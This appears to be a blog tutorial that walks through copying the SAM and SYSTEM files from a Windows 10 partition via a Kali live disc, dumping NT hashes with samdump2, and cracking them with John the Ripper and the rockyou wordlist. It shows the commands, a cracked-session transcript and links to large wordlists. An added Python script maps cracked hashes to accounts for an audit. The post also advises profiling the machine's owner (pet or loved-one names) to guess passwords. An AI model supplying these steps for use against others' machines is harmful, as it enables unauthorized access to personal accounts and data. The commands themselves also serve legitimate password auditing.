Posted: . At: 12:50 PM. This was 8 years ago. Post ID: 8813


Cracking Windows 10 passwords with John the Ripper on Kali Linux 2016.


Break Windows 10 password hashes with Kali Linux and John the Ripper

Cracking the SAM file in Windows 10 is easy with Kali Linux. Use a Live Kali Linux DVD and mount the Windows 10 partition.

Firstly, get the SAM and SYSTEM files from the C:\Windows\System32\config folder. Copy these to your desktop directory.

Then dump the password hashes.

root@kali:~/Desktop# samdump2 SYSTEM SAM -o out

Now grab the rockyou.txt wordlist.

root@kali:~/Desktop# zcat /usr/share/wordlists/rockyou.txt.gz > rock.txt

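Now I am attempting to crack the Windows user password. John takes the wordlist file as --wordlist=FILE, with an equals sign.

root@kali:~/Desktop# john out --format=nt --wordlist=rock.txt

If this is successful, output like the following should be printed. In the session captured below, the option was typed as -wordlist rock.txt, with a space instead of =. John reads a bare file name as a password file, which is why the first warning names rock.txt, and a --wordlist option with no file falls back to John's default wordlist.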

root@kali:~/Desktop# john out -format=nt -wordlist rock.txt 
Warning: invalid UTF-8 seen reading rock.txt
Using default input encoding: UTF-8
Loaded 54 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
password         ()
                 (*disabled* Administrator)
2g 0:00:00:00 DONE (2016-03-24 12:30) 200.0g/s 354600p/s 354600c/s 18442KC/s dirk..sss
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now cat the john.pot file; it should contain the cracked passwords.

root@kali:~/Desktop# cat ~/.john/john.pot 
$NT$8846f7eaee8fb117ad06bdd830b7586c:password
$NT$31d6cfe0d16ae931b73c59d7e0c089c0:
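
For an audit write-up, the john.pot entries above can be joined back to the samdump2 output to show which accounts have a blank password, a wordlist password, or a hash shared with another account. This is an added example, not code from the original post; the account names and the third hash are constructed, and the function names are hypothetical.

```python
from collections import defaultdict

# Constructed sample input in the pwdump-style layout samdump2 writes
# (user:RID:LM:NT:::). Account names and carol's hash are made up; the
# other two NT hashes are the ones in the john.pot listing above.
SAMPLE_DUMP = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:8846F7EAEE8FB117AD06BDD830B7586C:::
bob:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
carol:1003:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""
SAMPLE_POT = """\
$NT$8846f7eaee8fb117ad06bdd830b7586c:password
$NT$31d6cfe0d16ae931b73c59d7e0c089c0:
"""
PREFIX = "*disabled* "  # marker samdump2 puts in front of disabled accounts

def parse_pot(text):
    """Map lowercase NT hash -> recovered plaintext from john.pot lines."""
    cracked = {}
    for line in text.splitlines():
        if line.startswith("$NT$") and ":" in line:
            digest, plain = line[4:].split(":", 1)
            cracked[digest.lower()] = plain
    return cracked

def audit(dump_text, pot_text):
    """Return (user, rid, disabled, status, shares_hash_with) per account."""
    cracked = parse_pot(pot_text)
    rows, by_hash = [], defaultdict(list)
    for line in dump_text.splitlines():
        parts = line.split(":")
        if len(parts) < 4:
            continue  # skip blank or malformed lines
        name, rid, nt = parts[0], int(parts[1]), parts[3].lower()
        disabled = name.startswith(PREFIX)
        user = name[len(PREFIX):] if disabled else name
        by_hash[nt].append(user)
        rows.append((user, rid, disabled, nt))
    findings = []
    for user, rid, disabled, nt in rows:
        status = ("not cracked" if nt not in cracked else
                  "blank password" if cracked[nt] == "" else "weak: in wordlist")
        shared = [u for u in by_hash[nt] if u != user]
        findings.append((user, rid, disabled, status, shared))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_DUMP, SAMPLE_POT):
        print(finding)
```

Enabled accounts reported as "blank password" or "weak: in wordlist", and any non-empty shares_hash_with list, are the findings to fix first.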

If the password is in the wordlist, it should be cracked. This is easy, but the wordlist needs to be very large indeed to increase the possibility of cracking the password. Get as much information about the computer owner as possible. They might have used the name of their pet or loved one😳.

This directory contains a few very large wordlists:

https://download.g0tmi1k.com/wordlists/large/

https://www.renderlab.net/projects/WPA-tables/ has giant 33GB WPA PSK wordlists. These should also be good for cracking passwords.

